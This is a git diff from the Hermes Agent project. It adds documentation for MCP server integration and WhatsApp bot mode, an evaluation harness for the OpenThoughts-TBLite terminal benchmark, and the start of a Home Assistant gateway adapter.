+```
+
+Translation rules:
+
+1. **Key name**: `mcpServers` → `mcp_servers` (snake_case)
+2. **Format**: JSON → YAML (remove braces/brackets, use indentation)
+3. **Arrays**: `["a", "b"]` stays the same in YAML flow style, or use block style with `- a`
+4. **Everything else**: Keys (`command`, `args`, `env`) are identical
+
+## How It Works
+
+### Startup & Discovery
+
+When Hermes Agent starts, the tool discovery system calls `discover_mcp_tools()`:
+
+1. **Config loading** — Reads `mcp_servers` from `~/.hermes/config.yaml`
+2. **Background loop** — Spins up a dedicated asyncio event loop in a daemon thread for MCP connections
+3. **Connection** — Connects to each configured server (stdio subprocess or HTTP)
+4. **Session init** — Initializes the MCP client session (protocol handshake)
+5. **Tool discovery** — Calls `list_tools()` on each server to get available tools
+6. **Registration** — Registers each MCP tool into the Hermes tool registry with a prefixed name
+
+### Tool Registration
+
+Each discovered MCP tool is registered with a prefixed name following this pattern:
+
+```
+mcp_{server_name}_{tool_name}
+```
+
+Hyphens and dots in both server and tool names are replaced with underscores for API compatibility. For example:
+
+| Server Name | MCP Tool Name | Registered As |
+|-------------|--------------|---------------|
+| `filesystem` | `read_file` | `mcp_filesystem_read_file` |
+| `github` | `create-issue` | `mcp_github_create_issue` |
+| `my-api` | `query.data` | `mcp_my_api_query_data` |
+
+Tools appear alongside built-in tools — the agent sees them in its tool list and can call them like any other tool.
+
+### Tool Calling
+
+When the agent calls an MCP tool:
+
+1. The handler is invoked by the tool registry (sync interface)
+2. The handler schedules the actual MCP `call_tool()` RPC on the background event loop
+3. The call blocks (with timeout) until the MCP server responds
+4. Response content blocks are collected and returned as JSON
+5. Errors are sanitized to strip credentials before returning to the LLM
+
+### Shutdown
+
+On agent exit, `shutdown_mcp_servers()` is called:
+
+1. All server tasks are signalled to exit via their shutdown events
+2. Each server's `async with` context manager exits, cleaning up transports
+3. The background event loop is stopped and its thread is joined
+4. All server state is cleared
+
+## Security
+
+### Environment Variable Filtering
+
+When launching stdio MCP servers, Hermes does **not** pass your full shell environment to the subprocess. The `_build_safe_env()` function constructs a minimal environment:
+
+**Always passed through** (from your current environment):
+- `PATH`, `HOME`, `USER`, `LANG`, `LC_ALL`, `TERM`, `SHELL`, `TMPDIR`
+- Any variable starting with `XDG_`
+
+**Explicitly added**: Any variables you list in the server's `env` config.
+
+**Everything else is excluded** — your `OPENAI_API_KEY`, `AWS_SECRET_ACCESS_KEY`, database passwords, and other secrets are never leaked to MCP server subprocesses unless you explicitly add them.
+
+```yaml
+mcp_servers:
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      # Only this token is passed — nothing else from your shell
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxx"
+```
+
+### Credential Stripping in Errors
+
+If an MCP tool call fails, the error message is sanitized by `_sanitize_error()` before being returned to the LLM. The following patterns are replaced with `[REDACTED]`:
+
+- GitHub PATs (`ghp_...`)
+- OpenAI-style keys (`sk-...`)
+- Bearer tokens (`Bearer ...`)
+- Query parameters (`token=...`, `key=...`, `API_KEY=...`, `password=...`, `secret=...`)
+
+This prevents accidental credential exposure through error messages in the conversation.
+
+## Transport Types
+
+### Stdio Transport
+
+The default transport for locally-installed MCP servers. The server runs as a subprocess and communicates over stdin/stdout.
+
+```yaml
+mcp_servers:
+  my_server:
+    command: "npx"           # or "uvx", "python", any executable
+    args: ["-y", "package"]
+    env:
+      MY_VAR: "value"
+```
+
+**Pros:** Simple setup, no network needed, works offline.
+**Cons:** Server must be installed locally, one process per server.
+
+### HTTP / StreamableHTTP Transport
+
+For remote MCP servers accessible over HTTP. Uses the StreamableHTTP protocol from the MCP SDK.
+
+```yaml
+mcp_servers:
+  my_remote:
+    url: "https://mcp.example.com/endpoint"
+    headers:
+      Authorization: "Bearer token"
+```
+
+**Pros:** No local installation needed, shared servers, cloud-hosted.
+**Cons:** Requires network, slightly higher latency, needs `mcp` package with HTTP support.
+
+**Note:** If HTTP transport is not available in your installed `mcp` package version, Hermes will log a clear error and skip that server.
+
+## Reconnection
+
+If an MCP server connection drops after initial setup (e.g., process crash, network hiccup), Hermes automatically attempts to reconnect with exponential backoff:
+
+| Attempt | Delay Before Retry |
+|---------|--------------------|
+| 1 | 1 second |
+| 2 | 2 seconds |
+| 3 | 4 seconds |
+| 4 | 8 seconds |
+| 5 | 16 seconds |
+
+- Maximum of **5 retry attempts** before giving up
+- Backoff is capped at **60 seconds** (relevant if the formula exceeds this)
+- Reconnection only triggers for **established connections** that drop — initial connection failures are reported immediately without retries
+- If shutdown is requested during reconnection, the retry loop exits cleanly
+
+## Troubleshooting
+
+### Common Errors
+
+**"mcp package not installed"**
+
+```
+MCP SDK not available -- skipping MCP tool discovery
+```
+
+Solution: Install the MCP optional dependency:
+
+```bash
+pip install hermes-agent[mcp]
+```
+
+---
+
+**"command not found" or server fails to start**
+
+The MCP server command (`npx`, `uvx`, etc.) is not on PATH.
+
+Solution: Install the required runtime:
+
+```bash
+# For npm-based servers
+npm install -g npx    # or ensure Node.js 18+ is installed
+
+# For Python-based servers
+pip install uv        # then use "uvx" as the command
+```
+
+---
+
+**"MCP server 'X' has no 'command' in config"**
+
+Your stdio server config is missing the `command` key.
+
+Solution: Check your `~/.hermes/config.yaml` indentation and ensure `command` is present:
+
+```yaml
+mcp_servers:
+  my_server:
+    command: "npx"        # <-- required for stdio servers
+    args: ["-y", "package-name"]
+```
+
+---
+
+**Server connects but tools fail with authentication errors**
+
+Your API key or token is missing or invalid.
+
+Solution: Ensure the key is in the server's `env` block (not your shell env):
+
+```yaml
+mcp_servers:
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_your_actual_token"  # <-- check this
+```
+
+---
+
+**"MCP server 'X' is not connected"**
+
+The server disconnected and reconnection failed (or was never established).
+
+Solution:
+1. Check the Hermes logs for connection errors (`hermes --verbose`)
+2. Verify the server works standalone (e.g., run the `npx` command manually)
+3. Increase `connect_timeout` if the server is slow to start
+
+---
+
+**Connection timeout during discovery**
+
+```
+Failed to connect to MCP server 'X': TimeoutError
+```
+
+Solution: Increase the `connect_timeout` for slow-starting servers:
+
+```yaml
+mcp_servers:
+  slow_server:
+    command: "npx"
+    args: ["-y", "heavy-server-package"]
+    connect_timeout: 120   # default is 60
+```
+
+---
+
+**HTTP transport not available**
+
+```
+mcp.client.streamable_http is not available
+```
+
+Solution: Upgrade the `mcp` package to a version that includes HTTP support:
+
+```bash
+pip install --upgrade mcp
+```
+
+## Popular MCP Servers
+
+Here are some popular free MCP servers you can use immediately:
+
+| Server | Package | Description |
+|--------|---------|-------------|
+| Filesystem | `@modelcontextprotocol/server-filesystem` | Read/write/search local files |
+| GitHub | `@modelcontextprotocol/server-github` | Issues, PRs, repos, code search |
+| Git | `@modelcontextprotocol/server-git` | Git operations on local repos |
+| Fetch | `@modelcontextprotocol/server-fetch` | HTTP fetching and web content extraction |
+| Memory | `@modelcontextprotocol/server-memory` | Persistent key-value memory |
+| SQLite | `@modelcontextprotocol/server-sqlite` | Query SQLite databases |
+| PostgreSQL | `@modelcontextprotocol/server-postgres` | Query PostgreSQL databases |
+| Brave Search | `@modelcontextprotocol/server-brave-search` | Web search via Brave API |
+| Puppeteer | `@modelcontextprotocol/server-puppeteer` | Browser automation |
+| Sequential Thinking | `@modelcontextprotocol/server-sequential-thinking` | Step-by-step reasoning |
+
+### Example Configs for Popular Servers
+
+```yaml
+mcp_servers:
+  # Filesystem — no API key needed
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user/projects"]
+
+  # Git — no API key needed
+  git:
+    command: "uvx"
+    args: ["mcp-server-git", "--repository", "/home/user/my-repo"]
+
+  # GitHub — requires a personal access token
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxx"
+
+  # Fetch — no API key needed
+  fetch:
+    command: "uvx"
+    args: ["mcp-server-fetch"]
+
+  # SQLite — no API key needed
+  sqlite:
+    command: "uvx"
+    args: ["mcp-server-sqlite", "--db-path", "/home/user/data.db"]
+
+  # Brave Search — requires API key (free tier available)
+  brave_search:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-brave-search"]
+    env:
+      BRAVE_API_KEY: "BSA_xxxxxxxxxxxx"
+```
+
+## Advanced
+
+### Multiple Servers
+
+You can run as many MCP servers as you want simultaneously. Each server gets its own subprocess (stdio) or HTTP connection, and all tools are registered into a single unified namespace.
+
+Servers are connected sequentially during startup. If one server fails to connect, the others still work — failed servers are logged as warnings and skipped.
+
+### Tool Naming Convention
+
+All MCP tools follow the naming pattern:
+
+```
+mcp_{server_name}_{tool_name}
+```
+
+Both the server name and tool name are sanitized: hyphens (`-`) and dots (`.`) are replaced with underscores (`_`). This ensures compatibility with LLM function-calling APIs that restrict tool name characters.
+
+If you configure a server named `my-api` that exposes a tool called `query.users`, the agent will see it as `mcp_my_api_query_users`.
+
+### Configurable Timeouts
+
+Fine-tune timeouts per server based on expected response times:
+
+```yaml
+mcp_servers:
+  fast_cache:
+    command: "npx"
+    args: ["-y", "mcp-server-redis"]
+    timeout: 30            # Fast lookups — short timeout
+    connect_timeout: 15
+
+  slow_analysis:
+    url: "https://analysis.example.com/mcp"
+    timeout: 600           # Long-running analysis — generous timeout
+    connect_timeout: 120
+```
+
+### Idempotent Discovery
+
+`discover_mcp_tools()` is idempotent — calling it multiple times only connects to servers that aren't already running. Already-connected servers keep their existing connections and tool registrations.
+
+### Custom Toolsets
+
+Each MCP server's tools are automatically grouped into a toolset named `mcp-{server_name}`. These toolsets are also injected into all `hermes-*` platform toolsets, so MCP tools are available in CLI, Telegram, Discord, and other platforms.
+
+### Thread Safety
+
+The MCP subsystem is fully thread-safe. A dedicated background event loop runs in a daemon thread, and all server state is protected by a lock. This works correctly even with Python 3.13+ free-threading builds.
--- a/docs/messaging.md
+++ b/docs/messaging.md
@@ -4,27 +4,33 @@ Hermes Agent can connect to messaging platforms like Telegram, Discord, and What

 ## Quick Start

+The easiest way to configure messaging is the interactive wizard:
+
 ```bash
-# 1. Set your bot token(s) in ~/.hermes/.env
-echo 'TELEGRAM_BOT_TOKEN="your_telegram_bot_token"' >> ~/.hermes/.env
-echo 'DISCORD_BOT_TOKEN="your_discord_bot_token"' >> ~/.hermes/.env
-
-# 2. Test the gateway (foreground)
-./scripts/hermes-gateway run
-
-# 3. Install as a system service (runs in background)
-./scripts/hermes-gateway install
-
-# 4. Manage the service
-./scripts/hermes-gateway start
-./scripts/hermes-gateway stop
-./scripts/hermes-gateway restart
-./scripts/hermes-gateway status
+hermes gateway setup        # Configure Telegram, Discord, Slack, WhatsApp
 ```

-**Quick test (without service install):**
+This walks you through each platform with arrow-key selection, handles tokens, allowlists, and home channels, and offers to start/restart the gateway when done.
+
+**Or configure manually** by editing `~/.hermes/.env`:
+
 ```bash
-python cli.py --gateway  # Runs in foreground, useful for debugging
+# Set your bot token(s)
+echo 'TELEGRAM_BOT_TOKEN="your_telegram_bot_token"' >> ~/.hermes/.env
+echo 'DISCORD_BOT_TOKEN="your_discord_bot_token"' >> ~/.hermes/.env
+```
+
+**Then start the gateway:**
+
+```bash
+hermes gateway              # Run in foreground (useful for debugging)
+hermes gateway install      # Install as a system service (runs in background)
+
+# Manage the service
+hermes gateway start
+hermes gateway stop
+hermes gateway restart
+hermes gateway status
 ```

 ## Architecture Overview
@@ -141,7 +147,12 @@ pip install discord.py>=2.0

 ### WhatsApp

-WhatsApp uses a built-in bridge powered by [Baileys](https://github.com/WhiskeySockets/Baileys) that connects via WhatsApp Web. The agent links to your WhatsApp account and responds to incoming messages.
+WhatsApp uses a built-in bridge powered by [Baileys](https://github.com/WhiskeySockets/Baileys) that connects via WhatsApp Web.
+
+**Two modes:**
+
+- **`bot` mode (recommended):** Use a dedicated phone number for the bot. Other people message that number directly. All `fromMe` messages are treated as bot echo-backs and ignored.
+- **`self-chat` mode:** Use your own WhatsApp account. You talk to the agent by messaging yourself (WhatsApp → "Message Yourself").

 **Setup:**

@@ -149,12 +160,7 @@ WhatsApp uses a built-in bridge powered by [Baileys](https://github.com/WhiskeyS
 hermes whatsapp
 ```

-This will:
- Enable WhatsApp in your `.env`
- Ask for your phone number (for the allowlist)
- Install bridge dependencies (Node.js required)
- Display a QR code — scan it with your phone (WhatsApp → Settings → Linked Devices → Link a Device)
- Exit automatically once paired
+The wizard walks you through mode selection, allowlist configuration, dependency installation, and QR code pairing. For bot mode, you'll need a second phone number with WhatsApp installed on some device (dual-SIM with WhatsApp Business app is the easiest approach).

 Then start the gateway:

@@ -162,16 +168,23 @@ Then start the gateway:
 hermes gateway
 ```

-The gateway starts the WhatsApp bridge automatically using the saved session credentials in `~/.hermes/whatsapp/session/`.
-
 **Environment variables:**

 ```bash
 WHATSAPP_ENABLED=true
-WHATSAPP_ALLOWED_USERS=15551234567    # Comma-separated phone numbers with country code
+WHATSAPP_MODE=bot                      # "bot" (separate number) or "self-chat" (message yourself)
+WHATSAPP_ALLOWED_USERS=15551234567     # Comma-separated phone numbers with country code
 ```

-Agent responses are prefixed with "⚕ **Hermes Agent**" so you can distinguish them from your own messages when messaging yourself.
+**Getting a second number for bot mode:**
+
+| Option | Cost | Notes |
+|--------|------|-------|
+| WhatsApp Business app + dual-SIM | Free (if you have dual-SIM) | Install alongside personal WhatsApp, no second phone needed |
+| Google Voice | Free (US only) | voice.google.com, verify WhatsApp via the Google Voice app |
+| Prepaid SIM | $3-10/month | Any carrier; verify once, phone can go in a drawer on WiFi |
+
+Agent responses are prefixed with "⚕ **Hermes Agent**" for easy identification.

 > **Re-pairing:** If WhatsApp Web sessions disconnect (protocol updates, phone reset), re-pair with `hermes whatsapp`.

--- a/docs/tools.md
+++ b/docs/tools.md
@@ -55,6 +55,7 @@ async def web_search(query: str) -> dict:
 | **Clarify** | `clarify_tool.py` | `clarify` (interactive multiple-choice / open-ended questions, CLI-only) |
 | **Code Execution** | `code_execution_tool.py` | `execute_code` (run Python scripts that call tools via RPC sandbox) |
 | **Delegation** | `delegate_tool.py` | `delegate_task` (spawn subagents with isolated context, single + parallel batch) |
+| **MCP (External)** | `tools/mcp_tool.py` | Auto-discovered from configured MCP servers |

 ## Tool Registration

@@ -414,3 +415,20 @@ The Skills Hub enables searching, installing, and managing skills from online re

 **CLI:** `hermes skills search|install|inspect|list|audit|uninstall|publish|snapshot|tap`
 **Slash:** `/skills search|install|inspect|list|audit|uninstall|publish|snapshot|tap`
+
+## MCP Tools
+
+MCP (Model Context Protocol) tools are **dynamically registered** from external MCP servers configured in `cli-config.yaml`. Unlike built-in tools which are defined in Python source files, MCP tools are discovered at startup by connecting to each configured server and querying its available tools.
+
+Each MCP tool is automatically wrapped with an OpenAI-compatible schema and registered in the tool registry under the `mcp` toolset. Tool names are prefixed with the server name (e.g., `time__get_current_time`) to avoid collisions.
+
+**Key characteristics:**
+- Tools are discovered and registered at agent startup — no code changes needed
+- Supports both stdio (subprocess) and HTTP (streamable HTTP) transports
+- Auto-reconnects on connection failures with exponential backoff
+- Environment variables passed to stdio servers are filtered for security
+- Each server can have independent timeout settings
+
+**Configuration:** Add servers to `mcp_servers` in `cli-config.yaml`. See [docs/mcp.md](mcp.md) for full documentation.
+
+**Installation:** MCP support requires the optional `mcp` extra: `pip install hermes-agent[mcp]`
--- a/environments/benchmarks/tblite/README.md
+++ b/environments/benchmarks/tblite/README.md
@@ -0,0 +1,73 @@
+# OpenThoughts-TBLite Evaluation Environment
+
+This environment evaluates terminal agents on the [OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite) benchmark, a difficulty-calibrated subset of [Terminal-Bench 2.0](https://www.tbench.ai/leaderboard/terminal-bench/2.0).
+
+## Source
+
+OpenThoughts-TBLite was created by the [OpenThoughts](https://www.openthoughts.ai/) Agent team in collaboration with [Snorkel AI](https://snorkel.ai/) and [Bespoke Labs](https://bespokelabs.ai/). The original dataset and documentation live at:
+
+- **Dataset (source):** [open-thoughts/OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite)
+- **GitHub:** [open-thoughts/OpenThoughts-TBLite](https://github.com/open-thoughts/OpenThoughts-TBLite)
+- **Blog post:** [openthoughts.ai/blog/openthoughts-tblite](https://www.openthoughts.ai/blog/openthoughts-tblite)
+
+## Our Dataset
+
+We converted the source into the same schema used by our Terminal-Bench 2.0 environment (pre-built Docker Hub images, base64-encoded test tarballs, etc.) and published it as:
+
+- **Dataset (ours):** [NousResearch/openthoughts-tblite](https://huggingface.co/datasets/NousResearch/openthoughts-tblite)
+- **Docker images:** `nousresearch/tblite-<task-name>:latest` on Docker Hub (100 images)
+
+The conversion script is at `scripts/prepare_tblite_dataset.py`.
+
+## Why TBLite?
+
+Terminal-Bench 2.0 is one of the strongest frontier evaluations for terminal agents, but when a model scores near the floor (e.g., Qwen 3 8B at <1%), many changes look identical in aggregate score. TBLite addresses this by calibrating task difficulty using Claude Haiku 4.5 as a reference:
+
+| Difficulty | Pass Rate Range | Tasks |
+|------------|----------------|-------|
+| Easy       | >= 70%         | 40    |
+| Medium     | 40-69%         | 26    |
+| Hard       | 10-39%         | 26    |
+| Extreme    | < 10%          | 8     |
+
+This gives enough solvable tasks to detect small improvements quickly, while preserving enough hard tasks to avoid saturation. The correlation between TBLite and TB2 scores is **r = 0.911**.
+
+TBLite also runs 2.6-8x faster than the full TB2, making it practical for iteration loops.
+
+## Usage
+
+```bash
+# Run the full benchmark
+python environments/benchmarks/tblite/tblite_env.py evaluate
+
+# Filter to specific tasks
+python environments/benchmarks/tblite/tblite_env.py evaluate \
+    --env.task_filter "broken-python,pandas-etl"
+
+# Use a different model
+python environments/benchmarks/tblite/tblite_env.py evaluate \
+    --server.model_name "qwen/qwen3-30b"
+```
+
+## Architecture
+
+`TBLiteEvalEnv` is a thin subclass of `TerminalBench2EvalEnv`. All evaluation logic (agent loop, Docker sandbox management, test verification, metrics) is inherited. Only the defaults differ:
+
+| Setting        | TB2                              | TBLite                                  |
+|----------------|----------------------------------|-----------------------------------------|
+| Dataset        | `NousResearch/terminal-bench-2`  | `NousResearch/openthoughts-tblite`      |
+| Tasks          | 89                               | 100                                     |
+| Task timeout   | 1800s (30 min)                   | 1200s (20 min)                          |
+| Wandb name     | `terminal-bench-2`               | `openthoughts-tblite`                   |
+
+## Citation
+
+```bibtex
+@software{OpenThoughts-TBLite,
+  author = {OpenThoughts-Agent team, Snorkel AI, Bespoke Labs},
+  month = Feb,
+  title = {{OpenThoughts-TBLite: A High-Signal Benchmark for Iterating on Terminal Agents}},
+  howpublished = {https://www.openthoughts.ai/blog/openthoughts-tblite},
+  year = {2026}
+}
+```
--- a/environments/benchmarks/tblite/init.py
+++ b/environments/benchmarks/tblite/init.py
--- a/environments/benchmarks/tblite/default.yaml
+++ b/environments/benchmarks/tblite/default.yaml
@@ -0,0 +1,39 @@
+# OpenThoughts-TBLite Evaluation -- Default Configuration
+#
+# Eval-only environment for the TBLite benchmark (100 difficulty-calibrated
+# terminal tasks, a faster proxy for Terminal-Bench 2.0).
+# Uses Modal terminal backend for per-task cloud-isolated sandboxes
+# and OpenRouter for inference.
+#
+# Usage:
+#   python environments/benchmarks/tblite/tblite_env.py evaluate \
+#       --config environments/benchmarks/tblite/default.yaml
+#
+#   # Override model:
+#   python environments/benchmarks/tblite/tblite_env.py evaluate \
+#       --config environments/benchmarks/tblite/default.yaml \
+#       --openai.model_name anthropic/claude-sonnet-4
+
+env:
+  enabled_toolsets: ["terminal", "file"]
+  max_agent_turns: 60
+  max_token_length: 32000
+  agent_temperature: 0.8
+  terminal_backend: "modal"
+  terminal_timeout: 300        # 5 min per command (builds, pip install)
+  tool_pool_size: 128          # thread pool for 100 parallel tasks
+  dataset_name: "NousResearch/openthoughts-tblite"
+  test_timeout: 600
+  task_timeout: 1200           # 20 min wall-clock per task (TBLite tasks are faster)
+  tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
+  use_wandb: true
+  wandb_name: "openthoughts-tblite"
+  ensure_scores_are_not_same: false
+  data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite"
+
+openai:
+  base_url: "https://openrouter.ai/api/v1"
+  model_name: "anthropic/claude-opus-4.6"
+  server_type: "openai"
+  health_check: false
+  # api_key loaded from OPENROUTER_API_KEY in .env
--- a/environments/benchmarks/tblite/run_eval.sh
+++ b/environments/benchmarks/tblite/run_eval.sh
@@ -0,0 +1,42 @@
+#!/bin/bash
+
+# OpenThoughts-TBLite Evaluation
+#
+# Run from repo root:
+#   bash environments/benchmarks/tblite/run_eval.sh
+#
+# Override model:
+#   bash environments/benchmarks/tblite/run_eval.sh \
+#       --openai.model_name anthropic/claude-sonnet-4
+#
+# Run a subset:
+#   bash environments/benchmarks/tblite/run_eval.sh \
+#       --env.task_filter broken-python,pandas-etl
+#
+# All terminal settings (backend, timeout, lifetime, pool size) are
+# configured via env config fields -- no env vars needed.
+
+set -euo pipefail
+
+mkdir -p logs evals/openthoughts-tblite
+LOG_FILE="logs/tblite_$(date +%Y%m%d_%H%M%S).log"
+
+echo "OpenThoughts-TBLite Evaluation"
+echo "Log file: $LOG_FILE"
+echo ""
+
+# Unbuffered python output so logs are written in real-time
+export PYTHONUNBUFFERED=1
+
+# Show INFO-level agent loop timing (api/tool durations per turn)
+# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
+export LOGLEVEL=INFO
+
+python tblite_env.py evaluate \
+  --config default.yaml \
+  "$@" \
+  2>&1 | tee "$LOG_FILE"
+
+echo ""
+echo "Log saved to: $LOG_FILE"
+echo "Eval results: evals/openthoughts-tblite/"
--- a/environments/benchmarks/tblite/tblite_env.py
+++ b/environments/benchmarks/tblite/tblite_env.py
@@ -0,0 +1,119 @@
+"""
+OpenThoughts-TBLite Evaluation Environment
+
+A lighter, faster alternative to Terminal-Bench 2.0 for iterating on terminal
+agents. Uses the same evaluation logic as TerminalBench2EvalEnv but defaults
+to the NousResearch/openthoughts-tblite dataset (100 difficulty-calibrated
+tasks vs TB2's 89 harder tasks).
+
+TBLite tasks are a curated subset of TB2 with a difficulty distribution
+designed to give meaningful signal even for smaller models:
+  - Easy (40 tasks):   >= 70% pass rate with Claude Haiku 4.5
+  - Medium (26 tasks): 40-69% pass rate
+  - Hard (26 tasks):   10-39% pass rate
+  - Extreme (8 tasks): < 10% pass rate
+
+Usage:
+    python environments/benchmarks/tblite/tblite_env.py evaluate
+
+    # Filter to specific tasks:
+    python environments/benchmarks/tblite/tblite_env.py evaluate \\
+        --env.task_filter "broken-python,pandas-etl"
+"""
+
+import os
+import sys
+from pathlib import Path
+from typing import List, Tuple
+
+_repo_root = Path(__file__).resolve().parent.parent.parent.parent
+if str(_repo_root) not in sys.path:
+    sys.path.insert(0, str(_repo_root))
+
+from pydantic import Field
+
+from atroposlib.envs.base import EvalHandlingEnum
+from atroposlib.envs.server_handling.server_manager import APIServerConfig
+
+from environments.benchmarks.terminalbench_2.terminalbench2_env import (
+    TerminalBench2EvalConfig,
+    TerminalBench2EvalEnv,
+)
+
+
+class TBLiteEvalConfig(TerminalBench2EvalConfig):
+    """Configuration for the OpenThoughts-TBLite evaluation environment.
+
+    Inherits all TB2 config fields. Only the dataset default and task timeout
+    differ -- TBLite tasks are calibrated to be faster.
+    """
+
+    dataset_name: str = Field(
+        default="NousResearch/openthoughts-tblite",
+        description="HuggingFace dataset containing TBLite tasks.",
+    )
+
+    task_timeout: int = Field(
+        default=1200,
+        description="Maximum wall-clock seconds per task. TBLite tasks are "
+        "generally faster than TB2, so 20 minutes is usually sufficient.",
+    )
+
+
+class TBLiteEvalEnv(TerminalBench2EvalEnv):
+    """OpenThoughts-TBLite evaluation environment.
+
+    Inherits all evaluation logic from TerminalBench2EvalEnv (agent loop,
+    test verification, Docker image resolution, metrics, wandb logging).
+    Only the default configuration differs.
+    """
+
+    name = "openthoughts-tblite"
+    env_config_cls = TBLiteEvalConfig
+
+    @classmethod
+    def config_init(cls) -> Tuple[TBLiteEvalConfig, List[APIServerConfig]]:
+        env_config = TBLiteEvalConfig(
+            enabled_toolsets=["terminal", "file"],
+            disabled_toolsets=None,
+            distribution=None,
+
+            max_agent_turns=60,
+            max_token_length=16000,
+            agent_temperature=0.6,
+            system_prompt=None,
+
+            terminal_backend="modal",
+            terminal_timeout=300,
+
+            test_timeout=180,
+
+            # 100 tasks in parallel
+            tool_pool_size=128,
+
+            eval_handling=EvalHandlingEnum.STOP_TRAIN,
+            group_size=1,
+            steps_per_eval=1,
+            total_steps=1,
+
+            tokenizer_name="NousResearch/Hermes-3-Llama-3.1-8B",
+            use_wandb=True,
+            wandb_name="openthoughts-tblite",
+            ensure_scores_are_not_same=False,
+        )
+
+        server_configs = [
+            APIServerConfig(
+                base_url="https://openrouter.ai/api/v1",
+                model_name="anthropic/claude-sonnet-4",
+                server_type="openai",
+                api_key=os.getenv("OPENROUTER_API_KEY", ""),
+                health_check=False,
+            )
+        ]
+
+        return env_config, server_configs
+
+
+if __name__ == "__main__":
+    TBLiteEvalEnv.cli()
--- a/environments/benchmarks/terminalbench_2/run_eval.sh
+++ b/environments/benchmarks/terminalbench_2/run_eval.sh
@@ -12,21 +12,31 @@
 # Run a subset:
 #   bash environments/benchmarks/terminalbench_2/run_eval.sh \
 #       --env.task_filter fix-git,git-multibranch
+#
+# All terminal settings (backend, timeout, lifetime, pool size) are
+# configured via env config fields -- no env vars needed.
+
+set -euo pipefail

 mkdir -p logs evals/terminal-bench-2
 LOG_FILE="logs/terminalbench2_$(date +%Y%m%d_%H%M%S).log"

 echo "Terminal-Bench 2.0 Evaluation"
-echo "Log: $LOG_FILE"
+echo "Log file: $LOG_FILE"
 echo ""

-export TERMINAL_ENV=modal
-export TERMINAL_TIMEOUT=300
+# Unbuffered python output so logs are written in real-time
+export PYTHONUNBUFFERED=1

-python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
-  --config environments/benchmarks/terminalbench_2/default.yaml \
+# Show INFO-level agent loop timing (api/tool durations per turn)
+# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
+export LOGLEVEL=INFO
+
+python terminalbench2_env.py evaluate \
+  --config default.yaml \
  "$@" \
  2>&1 | tee "$LOG_FILE"

 echo ""
 echo "Log saved to: $LOG_FILE"
+echo "Eval results: evals/terminal-bench-2/"
--- a/gateway/config.py
+++ b/gateway/config.py
@@ -26,6 +26,7 @@ class Platform(Enum):
    DISCORD = "discord"
    WHATSAPP = "whatsapp"
    SLACK = "slack"
+    HOMEASSISTANT = "homeassistant"


@dataclass
@@ -378,6 +379,17 @@ def _apply_env_overrides(config: GatewayConfig) -> None:
                name=os.getenv("SLACK_HOME_CHANNEL_NAME", ""),
            )
    
+    # Home Assistant
+    hass_token = os.getenv("HASS_TOKEN")
+    if hass_token:
+        if Platform.HOMEASSISTANT not in config.platforms:
+            config.platforms[Platform.HOMEASSISTANT] = PlatformConfig()
+        config.platforms[Platform.HOMEASSISTANT].enabled = True
+        config.platforms[Platform.HOMEASSISTANT].token = hass_token
+        hass_url = os.getenv("HASS_URL")
+        if hass_url:
+            config.platforms[Platform.HOMEASSISTANT].extra["url"] = hass_url
+
    # Session settings
    idle_minutes = os.getenv("SESSION_IDLE_MINUTES")
    if idle_minutes:
--- a/gateway/platforms/homeassistant.py
+++ b/gateway/platforms/homeassistant.py
@@ -0,0 +1,432 @@
+"""
+Home Assistant platform adapter.
+
+Connects to the HA WebSocket API for real-time event monitoring.
+State-change events are converted to MessageEvent objects and forwarded
+to the agent for processing.  Outbound messages are delivered as HA
+persistent notifications.
+
+Requires:
+- aiohttp (already in messaging extras)
+- HASS_TOKEN env var (Long-Lived Access Token)
+- HASS_URL env var (default: http://homeassistant.local:8123)
+"""
+
+import asyncio
+import json
+import logging
+import os
+import time
+import uuid
+from datetime import datetime
+from typing import Any, Dict, List, Optional, Set
+
+try:
+    import aiohttp
+    AIOHTTP_AVAILABLE = True
+except ImportError:
+    AIOHTTP_AVAILABLE = False
+    aiohttp = None  # type: ignore[assignment]
+
+from gateway.config import Platform, PlatformConfig
+from gateway.platforms.base import (
+    BasePlatformAdapter,
+    MessageEvent,
+    MessageType,
+    SendResult,
+)
+
+logger = logging.getLogger(__name__)
+
+
+def check_ha_requirements() -> bool:
+    """Check if Home Assistant dependencies are available and configured."""
+    if not AIOHTTP_AVAILABLE:
+        return False
+    if not os.getenv("HASS_TOKEN"):
+        return False
+    return True
+
+
+class HomeAssistantAdapter(BasePlatformAdapter):
+    """
+    Home Assistant WebSocket adapter.
+
+    Subscribes to ``state_changed`` events and forwards them as
+    MessageEvent objects.  Supports domain/entity filtering and
+    per-entity cooldowns to avoid event floods.
+    """
+
+    MAX_MESSAGE_LENGTH = 4096
+
+    # Reconnection backoff schedule (seconds)
+    _BACKOFF_STEPS = [5, 10, 30, 60]
+
+    def __init__(self, config: PlatformConfig):
+        super().__init__(config, Platform.HOMEASSISTANT)
+
+        # Connection state
+        self._session: Optional["aiohttp.ClientSession"] = None
+        self._ws: Optional["aiohttp.ClientWebSocketResponse"] = None
+        self._rest_session: Optional["aiohttp.ClientSession"] = None
+        self._listen_task: Optional[asyncio.Task] = None
+        self._msg_id: int = 0
+
+        # Configuration from extra
+        extra = config.extra or {}
+        token = config.token or os.getenv("HASS_TOKEN", "")
+        url = extra.get("url") or os.getenv("HASS_URL", "http://homeassistant.local:8123")
+        self._hass_url: str = url.rstrip("/")
+        self._hass_token: str = token
+
+        # Event filtering
+        self._watch_domains: Set[str] = set(extra.get("watch_domains", []))
